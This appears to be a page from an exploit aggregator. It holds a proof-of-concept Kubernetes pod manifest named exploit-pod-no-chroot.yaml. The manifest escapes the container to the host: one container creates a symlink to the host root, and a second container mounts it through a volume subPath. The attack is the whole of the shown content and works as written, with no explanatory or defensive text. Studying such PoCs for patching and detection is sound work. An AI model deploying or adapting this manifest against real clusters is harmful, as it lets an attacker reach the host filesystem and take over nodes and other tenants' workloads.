4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit-pod-no-chroot.yaml YAML
---
apiVersion: v1
kind: Pod
metadata:
  name: subpath
spec:
  containers:
  - image: nginx:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
         drop:
           - CHOWN
           - DAC_OVERRIDE
           - FOWNER
           - FSETID
           - KILL
           - SETGID
           - SETUID
           - SETPCAP
           - NET_BIND_SERVICE
           - NET_ADMIN
           - NET_RAW
           - SYS_CHROOT
           - MKNOD
           - AUDIT_WRITE
    name: setup
    imagePullPolicy: "Always"
    command: ["/bin/bash"]
    args: ["-c", "cd /rootfs && rm -rf hostetc && ln -s / /rootfs/host && touch /status/done && sleep infinity"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
    - mountPath: /status
      name: status-volume
  - image: nginx:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
         drop:
           - CHOWN
           - DAC_OVERRIDE
           - FOWNER
           - FSETID
           - KILL
           - SETGID
           - SETUID
           - SETPCAP
           - NET_BIND_SERVICE
           - NET_ADMIN
           - NET_RAW
           - SYS_CHROOT
           - MKNOD
           - AUDIT_WRITE
    name: exploit
    imagePullPolicy: "Always"
    command: ["/bin/bash"]
    args: ["-c", "if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
      subPath: host
    - mountPath: /status
      name: status-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: status-volume
    emptyDir: {}